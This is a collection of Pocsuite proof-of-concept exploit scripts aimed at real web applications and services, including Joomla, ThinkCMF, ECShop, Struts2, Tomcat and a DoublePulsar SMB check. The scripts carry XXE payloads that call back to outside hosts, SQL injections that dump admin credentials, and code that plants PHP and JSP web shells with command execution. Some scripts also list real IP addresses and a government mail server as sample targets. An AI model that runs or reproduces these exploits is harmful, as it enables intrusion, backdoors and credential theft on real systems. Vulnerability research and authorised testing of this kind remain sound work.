        payload_win = '<?xml version="1.0"?> <!DOCTYPE b [<!ENTITY xxe SYSTEM "http://5rqfog.ceye.io/sworderNB22222-----">]><name>&xxe;</name>'
        # payload_linux = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE data [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/hosts"><!ENTITY % dtd SYSTEM "http://120.79.178.83/xxe/xxe.xml">%dtd; %all;]><value>&send;</value>'
        resp_win = post_url(self.url + payload1,payload_win)
        # resp_linux = post_url(self.url,payload_linux)
        match_id = get_id()
        time.sleep(1)
        if init_id != match_id:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = 'anmai teacher sql injection'
    vulID = '0'
    author = ['LRestless']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://shuimugan.com/bug/view?bug_no=108502', 'https://shuimugan.com/bug/view?bug_no=106717', 'https://shuimugan.com/bug/view?bug_no=0107248']
    desc = '''anmai  teacher 模块  time模块  注入打包'''
    vulDate = '2015-04-13'
    createDate = '2019-04-11'
    updateDate = '2019-04-11'

    appName = 'anmai'
    appVersion = ''
    appPowerLink = 'http://www.anmai.net/'
    samples = ['re']

    url_list = ['/teacher/teachingtechnology/patentinfoEdit.aspx?id=1',
                '/teacher/teachingtechnology/teachingcoursewareEdit.aspx?id=1',
                '/teacher/teachingtechnology/wonderfulcoursewareEdit.aspx?id=1',
                '/teacher/teachingtechnology/ColligationSelect/TeachingExperience_P.aspx?id=1',
                '/teacher/teachingtechnology/ColligationSelect/TeachingPlan_P.aspx?id=1',
                '/teacher/teachingtechnology/ColligationSelect/TeachingPractise_P.aspx?id=1',
                '/teacher/teachingtechnology/ColligationSelect/TeachingReflect_P.aspx?id=1',
                '/teacher/teachingtechnology/ColligationSelect/TeachingSum_up_P.aspx?id=1',
                '/teacher/teachingtechnology/ColligationSelect/wonderfulcourseware_P.aspx?id=1',
                '/teacher/teachingtechnology/Course_Record_P.aspx?id=1',
                '/teacher//teachingtechnology/Literature_P.aspx?id=1',
                '/teacher/teachingtechnology/Patentinfo_P.aspx?id=1',
                '/teacher/teachingtechnology/Specialtyinfo_P.aspx?id=1',
                '/teacher/teachingtechnology/TitlePractice_P.aspx?id=1',
                '/teacher/teachingtechnology/TitleResearch_P.aspx?id=1',
                '/teacher/teachingtechnology/AppraiseDepReSet.aspx?type=getteatype&depid=1&cardid=1',
                '/teacher/mystudy/exchangestudyxiangxi.aspx?id=1',
                '/teacher/mystudy/peixunxiangxi.aspx?id=1',
                '/teacher/mystudy/professionxiangxi.aspx?id=1',
                '/teacher/mystudy/specialxiangxi.aspx?id=1',
                '/time/shezhiSystem/HBCourse.aspx?Gradename=1',
                '/time/ChangeCourse/HandChagneCourse.aspx?clsname=1',
                '/time/InsertCourseTable/rightInsertCourseTable.aspx?clsname=1',
                '/time/ChangeCourse/ChangeCourseList.aspx?idcard=1',
                '/TWmanage/weisheng/healthteachxx.aspx?id=1',
                '/oa/stock/applyInfo.aspx?username=1',
                '/RecruitstuManage/hiddenValue.aspx?topicid=1']

    def _attack(self):
        """attack mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        for i in self.url_list:
            url = self.url.strip('/') + i
            payload = "'+and+1=%28SELECT%20%20char%28126%29%2bDB_NAME()%2bchar%28126%29%29--+"
            url_p = url + payload
            resp = s.get(url_p)
            dbname = re.search('~(.*?)~', resp.content)
            if dbname:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['Database'] = {}
                result['Database']['DBname'] = dbname.group(1)
                break
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        result['VerifyInfo'] = {}
        j = 0
        for i in self.url_list:
            url = self.url.strip('/') + i
            payload = "'+and+1=%28SELECT%20%20CHAR%28115%29%2bCHAR%28104%29%2bCHAR%28117%29%2bCHAR%2890%29%2bCHAR%2873%29%2bCHAR%28103%29%2bCHAR%28117%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2888%29%2bCHAR%2873%29%2bCHAR%2878%29%2bCHAR%2871%29%29--+"
            url_p = url + payload
            resp = s.get(url_p)
            time.sleep(0.5)
            if 'shuZIguanXING' in resp.content:
                result['VerifyInfo']['URL'+str(j)] = url
                j += 1
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from urlparse import urljoin
from pocsuite.api.request import req
import hashlib
import json
import string
import random
class TestPOC(POCBase):
    vulID = ''
    version = '1.0'
    author = 'co0ontty'
    vulDate = '2019-10-24'
    createDate = '2019-10-25'
    updateDate = '2019-10-25'
    references = ['']
    name = 'ThinkCMF 任意内容包含漏洞'
    appPowerLink = 'https://www.thinkcmf.com/'
    appName = 'ThinkCMF'
    appVersion = 'E-cology OA V9 V8'
    vulType = '文件包含'
    desc = '''
    远程攻击者在无需任何权限情况下，通过构造特定的请求包即可在远程服务器上执行任意代码
    '''
    samples = ['http://42.243.25.75:8082/mobile/DBconfigReader.jsp']
    install_requires = ['']
    def _verify(self):
        def ThinkCMF_getshell(url):
            verifycode = ''.join(random.sample(string.ascii_letters + string.digits, 8))
            vuln_url = url + R'''/index.php?a=fetch&templateFile=public/inde&prefix=%27%27&content=<php>file_put_contents('{}.php','%3c%3fphp%0d%0aecho%20md5%28%22{}%22%29%3b%0d%0a%20%20%20%20if%28isset%28%24_REQUEST%5b%22cmd%22%5d%29%29%7b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3cpre%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%24cmd%20%3d%20%28%24_REQUEST%5b%22cmd%22%5d%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20system%28%24cmd%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3c%2fpre%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20die%3b%0d%0a%20%20%20%20%7d%0d%0aphpinfo%28%29%3b%0d%0a%3f%3e')</php>'''.format(verifycode,verifycode)
            r = req.get(vuln_url)
            response_str = json.dumps(r.headers.__dict__['_store'])
            if r.status_code == 200 and 'PHP' in response_str:
                check_shell(url,verifycode)
        def check_shell(url,verifycode):
            shell_url = url + '/{}.php'.format(verifycode)
            r = req.get(shell_url)
            if r.status_code == 200 and hashlib.md5(verifycode).hexdigest() in r.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = urljoin(self.url,"/{}.php".format(verifycode))
                req.get(urljoin(self.url,"/{}.php?cmd=rm -rf {}.php".format(verifycode,verifycode)))
        result = {}
        ThinkCMF_getshell(self.url)
        return self.parse_output(result)

    _attack = _verify

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8


import urllib
import random
import string

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


REMARK='''attack_payload 生成方法:
<?php
header("Content-Type: text/plain");
class JSimplepieFactory {
}
class JDatabaseDriverMysql {
  
}
class SimplePie {
    var $sanitize;
    var $cache;
    var $cache_name_function;
    var $javascript;
    var $feed_url;
    function __construct()
    {
        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
        $this->javascript = 9999;
        $this->cache_name_function = "assert";
        $this->sanitize = new JDatabaseDriverMysql();
        $this->cache = true;
    }
}
  
class JDatabaseDriverMysqli {
    protected $a;
    protected $disconnectHandlers;
    protected $connection;
    function __construct()
    {
        $this->a = new JSimplepieFactory();
        $x = new SimplePie();
        $this->connection = 1;
        $this->disconnectHandlers = [
            [$x, "init"],
        ];
    }
}
  
$a = new JDatabaseDriverMysqli();
$result = serialize($a);
$result = str_replace(chr(0).'*'.chr(0), '\x5C0\x5C0\x5C0', $result);
echo '}__t|'.$result.'\xF0\x9D\x8C\x86';
?>
'''

class TestPOC(POCBase):
    vulID = '1111'  # vul ID
    version = '1'
    author = 'alpha1e0'
    vulDate = '2015-12-15'
    createDate = '2015-12-15'
    updateDate = '2015-12-15'
    references = ['http://drops.wooyun.org/papers/11330']
    name = 'Joomla 1.5~3.4 session 对象注入漏洞 POC'
    appPowerLink = 'https://www.joomla.org/'
    appName = 'Joomla'
    appVersion = '1.5~3.4'
    vulType = '代码注入'
    desc = '''
        joomla 1.5~3.4 session 对象注入漏洞，成功利用同时需要PHP < 5.6.13。joomla中session存储在数据库中，其中user-agent，
        x-forward-for未经过滤存储到数据库中，可在其中插入序列化对象，session_start后自动反序列化触发命令执行
    '''

    #samples = ['http://216.119.147.168/', 'http://69.172.67.176/']

    def _attack(self):
        result = {}
        vul_url = self.url

        #php_code = '''print "start-->|";echo __FILE__;'''
        #php_code = '''print "start-->|";echo getcwd();'''
        #php_code = '''$s='<?php @eval($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
        php_code = '''$s='<?php $f=strrev($_GET["f"]);$f($_POST["pass"]);?>';$n=dirname(dirname(dirname(__FILE__)))."/images/parse.php";$f=fopen($n,"w");fwrite($f,$s);'''
        
        attack_payload = self.gen_payload(php_code)
        #print attack_payload

        session = req.Session()
        response = session.get(vul_url, headers={"User-Agent":attack_payload})
        if response.status_code != 200:
            return self.parse_attack(result)

        response = session.get(vul_url)
        #loc = response.content.find("start-->")
        #print response.content[loc:]
        response = session.get(vul_url.rstrip("/") + "/images/parse.php")
        if response.status_code == 200:
            result['ShellInfo'] = {}
            result['ShellInfo']['URL'] = "/images/parse.php?f=tressa"
            result['ShellInfo']['Content'] = 'password: pass'

        return self.parse_attack(result)


    def _verify(self, verify=True):
        result = {}
        vul_url = self.url

        php_code = '''echo "asdfgh123456";'''
        attack_payload = self.gen_payload(php_code)

        session = req.Session()
        response = session.get(vul_url, headers={"User-Agent":attack_payload})
        if response.status_code != 200:
            return self.parse_attack(result)

        response = session.get(vul_url)
        if response.status_code == 200 and 'asdfgh123456' in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = attack_payload

        return self.parse_attack(result)


    def gen_payload(self, raw_payload):
        template = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\x5C0\x5C0\x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:%d:"%sJFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\x5C0\x5C0\x5C0connection";b:1;}\xF0\x9D\x8C\x86' 
        
        encoded_payload = ".".join(["chr({0})".format(ord(x)) for x in raw_payload])
        encoded_payload = "eval({0});".format(encoded_payload)

        return template % (27+len(encoded_payload), encoded_payload)


    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Not vulnerable')
        return output


register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '64022'  # ssvid
    version = '1.0'
    author = ['皮皮']
    vulDate = '2006-09-28'
    createDate = '2015-12-24'
    updateDate = '2015-12-24'
    references = ['http://www.sebug.net/vuldb/ssvid-64022']
    name = 'Minerva &lt;= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability'
    appPowerLink = 'http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download'
    appName = 'Minerva'
    appVersion = '<= 2.0.21'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://?' % self.url
        res = req.get(vul_url)

        if 'Baiduspider' in res.content and 'Googlebot' in res.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
import re
import urllib

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = 'SSV-60643'
    version = '1'
    author = '0x153'
    vulDate = '2013-02-22'
    createDate = '2015-10-15'
    updateDate = '2015-10-15'
    references = ['http://www.sebug.net/vuldb/ssvid-60643','http://www.tuicool.com/articles/vauaMz','http://www.waitalone.cn/ecshop-alipay-plug-injected-exp.html']
    name = 'ECShop支持宝插件SQL注入漏洞'
    appPowerLink = 'www.ecshop.com'
    appName = 'ECShop'
    appVersion = '2.7.3'
    vulType = 'SQL Injection'
    desc = '''
       ECShop支持宝插件SQL注入漏洞
    '''

    samples = ['']

    '''
    获取标准url
    @param url 需要转化的url
    '''
    def get_standard_url(self,data,url):
        if url.count("http") != 0:
          if url[-1] == '/':  #http://www.xxoo.com/
            url = "%s%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
          else:   #http://www.xxoo.com
            url = "%s/%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
        else: 
          if url[-1] ==  '/':  #www.xxoo.com/club/
            url = "http://%s%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
          else:   #www.xxoo.com/club
            url = "http://%s/%s" % (url,urllib.quote(data,"?@`[]*,+()/'&=!_%"))
        return url

    '''
    获取表前缀
    @param url 目标主机的url
    '''
    def get_table_pre(self,url):
        data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(table_name) from information_schema.tables where table_schema=database() limit 1))a from information_schema.tables group by a)b%23"
        url = self.get_standard_url(data,url)
 
        pattern = re.compile(r"Duplicate entry '[0,1]?(.+?)[0,1]?'")

        '''
        使用这种注入方式存在一定不确定性，需要多循环几次
        '''
        for i in range(10): 
            r = req.get(url)
            ret = pattern.findall(r.content)
            if ret:
                if ret[0].count('ecs') != 0:
                    return 'ecs'
                else:
                    return ret[0][0:ret[0].index('_')]  
        return None

    '''
    注入攻击代码
    @param url 目标主机的url
    @param count 爆数据的参数，default=0
    @param table_pre 数据库表前缀
    '''
    def _attack(self):
        try:
            result ={}
            #获取表前缀
            table_pre = self.get_table_pre(self.url)
            if table_pre is None:
                return self.parse_attack(result)
            #获取url
            data = "respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(CHAR(126),CHAR(126),CHAR(126),user_name,CHAR(124),CHAR(124),CHAR(124),password,CHAR(126),CHAR(126),CHAR(126)) from {table_pre}_admin_user limit 1))a from information_schema.tables group by a)b%23".format(table_pre=table_pre)
            url = self.get_standard_url(data,self.url)

            pattern = re.compile(r"~~~(\w+?)\|\|\|(\w+?)~~~")

            for i in range(10):
                r = req.get(url)
                re_result = pattern.findall(r.content.decode(r.encoding))
                if re_result:
                    result['AdminInfo'] = {}
                    result['AdminInfo']['Username'] = re_result[0][0]
                    result['AdminInfo']['Password'] = re_result[0][1]
                    return self.parse_attack(result)
            return self.parse_attack(result)
        except:
            import traceback
            traceback.print_exc()

    def _verify(self, verify=True):
        try:
            result = {}
            payload = "/respond.php?code=alipay&subject=0&out_trade_no=%00' union select 1 from (select count(*),concat(floor(rand()*2),(select md5(123456)))a from information_schema.tables group by a)b%23"
            vulurl = self.url + payload

            '''
            本地测试的时候，存在不稳定的情况，
            可能是MySQL的bug，使用循环减少误报
            '''
            for i in range(10): 
                respond = req.get(vulurl)
                if 'e10adc3949ba59abbe56e057f20f883e' in respond.content:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = vulurl
                    return self.parse_attack(result)
            return self.parse_attack(result)
        except:
            import traceback
            traceback.print_exc()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '63921'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2006-09-06'
    createDate = '2015-11-16'
    updateDate = '2015-11-16'
    references = ['http://www.sebug.net/vuldb/ssvid-63921']
    name = 'FlashChat &lt;= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability'
    appPowerLink = 'N/A'
    appName = 'FlashChat'
    appVersion = '<=4.5.7'
    vulType = 'Other'
    desc = '''
        FlashChat在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞以Web进程权限执行任意命令。
        FlashChat的/inc/cmses/aedating4CMS.php、/inc/cmses/aedatingCMS.php和/inc/cmses/aedatingCMS2.php脚本
        没有正确验证dir[inc]变量用户输入，远程攻击者通过包含本地或外部资源的任意文件导致执行任意脚本代码。
    '''
    samples = ['']

    def _attack(self):
        result = {}
        
        #远程文件内容是<?php echo md5('3.1416');?>
        payload='http://tool.scanv.com/wsl/php_verify.txt?'
        #漏洞测试地址
        expUrl='{url}/inc/cmses/aedating4CMS.php?dir[inc]={py}'.format(url=self.url,py=payload)     
        try:
            response=req.get(expUrl, headers=self.headers, timeout=50)
            match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response.content)
            if match:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = expUrl
            else:
                result={}
        except:
            result={}
        return self.parse_output(result)

    def _verify(self):
        result = {}
        #Write your code here

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/python
# -*- coding: utf-8 -*-

import string
import time
import random
from pocsuite.api.request import req #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.utils import randomStr


class TestPOC(POCBase):
    name = 'Struts2 S2-057 Remote Code Execution'
    vulID = '4'  # https://www.seebug.org/vuldb/ssvid-93077
    author = ['liujun']
    vulType = 'cmd-exec'
    version = '1.0'    # default version: 1.0
    references = ['https://github.com/vulhub/vulhub/tree/master/struts2/s2-057']
    desc = '''Struts2 S2-057 Remote Code Execution'''

    vulDate = '2018-08-23'
    createDate = '2019-03-26'
    updateDate = '2019-03-26'

    appName = 'Struts2'
    appVersion = '2.3.x'
    appPowerLink = 'https://struts.apache.org/'
    samples = ['']


    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify mode"""
        result = {}
        random1 = random.randint(999,9999)
        random2 = random.randint(999,9999)
        random3 = random1 * random2
        spliturl = self.url.split('/')
        targetUrl = spliturl[-1]
        targetUrl  = '${{{0}*{1}}}'.format(random1,random2) + "/" + targetUrl
        finalUrl = "http://"
        for i in range(1,len(spliturl)-1):
            if spliturl[i] != '':
                finalUrl = finalUrl + spliturl[i] + "/"

        finalUrl = finalUrl + targetUrl

        #print finalUrl

        matchstring = str(random3)
        #print random3
        try:
            resp = req.get(finalUrl,allow_redirects=False)
        #print resp.headers

            if matchstring in resp.headers['location'].lower():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except:
            pass
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-

from pocsuite.api.poc import register
from pocsuite.api.request import req
from pocsuite.api.poc import Output, POCBase
from pocsuite.lib.utils.funs import url2ip
import urlparse
import telnetlib


class TestPOC(POCBase):
    name = "Grandsteam GXV3611_HD - SQL Injection "
    vulID = ''
    author = ['sebao']
    vulType = 'SQLinjection'
    version = '1.0'    # default version: 1.0
    references = ['https://www.exploit-db.com/exploits/40441/ ']
    desc = '''Grandsteam GXV3611_HD - telnet SQL Injection'''
    dork='GXV3611IR_HD'
    #Server:GS-Webs
    vulDate = ''
    createDate = '2017-6-29'
    updateDate = '2017-6-29'
    appName = 'Grandsteam GXV3611_HD,GXV3611IR_HD,'
    appVersion = 'GXV3611_HD,'
    appPowerLink = ''
    samples = ['88.80.119.74']

    def _attack(self):
        return self._verify(self)

    def _verify(self):
        '''verify mode'''
        result = {}
        target = self.url
        resq = req.get(target)
        if "/Everything.gif" in resq.text :
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target


        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : jeffzhang
# @Time    : 2018/01/10
# @File    : _180219_Tomcat_7_PUT_RCE.py.py
# @Desc    : ""


from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import random
import time


class TestPOC(POCBase):
    name = "Tomcat Remote Code Execution"
    vulID = ''
    author = 'jeffzhang'
    vulType = 'code execution'
    version = '1.0'
    references = ''
    desc = '''Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability'''
    vulDate = '2017-9-19'
    createDate = '2017-9-19'
    updateDate = '2017-9-20'
    appName = 'Apache Tomcat'
    appVersion = '7.0.0 - 7.0.79'
    appPowerLink = ''
    samples = []

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        a = random.randint(100000, 900000)
        b = random.randint(100000, 900000)
        body = """<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
        <%out.println({0}+{1});%>""" .format(str(a), str(b))
        url = self.url
        resp = req.options(url+'/asda',timeout=10)
        if 'allow' in resp.headers and resp.headers['allow'].find('PUT') > 0:
            shell_url = url + "/" + str(int(time.time())) + '.jsp/'
            resp1 = req.put(shell_url, body)
            print resp1.status_code
            resp2 = req.get(shell_url[:-1])
            c = a + b
            if resp1.status_code == 201 and str(c) in resp2.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import urlparse

class TestPOC(POCBase):
    vulID = '90225'  # ssvid
    version = '1.0'
    author = ['Magic']
    vulDate = '2015-04-08'
    createDate = '2016-05-31'
    updateDate = '2016-05-31'
    references = ['http://www.wooyun.org/bugs/wooyun-2016-0181592','http://www.wooyun.org/bugs/wooyun-2011-0177116']
    name = 'Himail邮件系统某处文件包含'
    appPowerLink = 'http://www.himail.com.cn/'
    appName = 'HiMail'
    appVersion = '7.x'
    vulType = 'File Inclusion'
    desc = '''   
    HiMail File Inclusion
    '''
    samples = ['http://mail.gzhfda.gov.cn/']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        result['VerifyInfo'] = {}
        arr = urlparse.urlparse(self.url)
        vulurl = '%s://%s/' % (arr.scheme,arr.netloc)
        payload = 'resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd'
        url = self.url + payload
        res_exp = req.get(url)
        if res_exp.status_code == 200 and '/bin/bash' in res_exp.content:
            result['VerifyInfo']['URL'] = self.url + payload
        return self.parse_attack(result)

    def parse_attack(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/python
# -*- coding: utf-8 -*-

import binascii
import socket

from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.api.utils import url2ip


class TestPOC(POCBase):
    name = "Doublepulsar后门"
    vulID = ''
    author = ['seebug']
    vulType = 'Buffer Overflow'
    version = '1.0'
    references = ['http://paper.seebug.org/279/']
    desc = '''Doublepulsar backdoor'''

    vulDate = ''
    createDate = '2017-04-14'
    updateDate = '2016-04-14'

    appName = 'Windows'
    appVersion = '2003'
    appPowerLink = ''
    samples = []

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        """verify mode"""
        # Packets
        negotiate_protocol_request = binascii.unhexlify(
            "00000085ff534d4272000000001853c00000000000000000000000000000fffe00004000006200025043204e4554574f524b2050524f4752414d20312e3000024c414e4d414e312e30000257696e646f777320666f7220576f726b67726f75707320332e316100024c4d312e325830303200024c414e4d414e322e3100024e54204c4d20302e313200")
        session_setup_request = binascii.unhexlify(
            "00000088ff534d4273000000001807c00000000000000000000000000000fffe000040000dff00880004110a000000000000000100000000000000d40000004b000000000000570069006e0064006f007700730020003200300030003000200032003100390035000000570069006e0064006f007700730020003200300030003000200035002e0030000000")
        tree_connect_request = binascii.unhexlify(
            "00000060ff534d4275000000001807c00000000000000000000000000000fffe0008400004ff006000080001003500005c005c003100390032002e003100360038002e003100370035002e003100320038005c00490050004300240000003f3f3f3f3f00")
        trans2_session_setup = binascii.unhexlify(
            "0000004eff534d4232000000001807c00000000000000000000000000008fffe000841000f0c0000000100000000000000a6d9a40000000c00420000004e0001000e000d0000000000000000000000000000")
        timeout = 30
        ip = url2ip(self.url)
        result = {}

        # Connect to socket
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(float(timeout) if timeout else None)
        host = ip
        port = 445
        s.connect((host, port))

        # Send/receive negotiate protocol request
        s.send(negotiate_protocol_request)
        s.recv(1024)

        # Send/receive session setup request
        s.send(session_setup_request)
        session_setup_response = s.recv(1024)

        # Extract user ID from session setup response
        user_id = session_setup_response[32:34]

        # Replace user ID in tree connect request packet
        modified_tree_connect_request = list(tree_connect_request)
        modified_tree_connect_request[32] = user_id[0]
        modified_tree_connect_request[33] = user_id[1]
        modified_tree_connect_request = "".join(modified_tree_connect_request)

        # Send tree connect request
        s.send(modified_tree_connect_request)
        tree_connect_response = s.recv(1024)

        # Extract tree ID from response
        tree_id = tree_connect_response[28:30]

        # Replace tree ID and user ID in trans2 session setup packet
        modified_trans2_session_setup = list(trans2_session_setup)
        modified_trans2_session_setup[28] = tree_id[0]
        modified_trans2_session_setup[29] = tree_id[1]
        modified_trans2_session_setup[32] = user_id[0]
        modified_trans2_session_setup[33] = user_id[1]
        modified_trans2_session_setup = "".join(modified_trans2_session_setup)

        # Send trans2 sessions setup request
        s.send(modified_trans2_session_setup)
        final_response = s.recv(1024)

        s.close()

        # Check for 0x51 response to indicate DOUBLEPULSAR infection
        if final_response[34] == "\x51":
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)
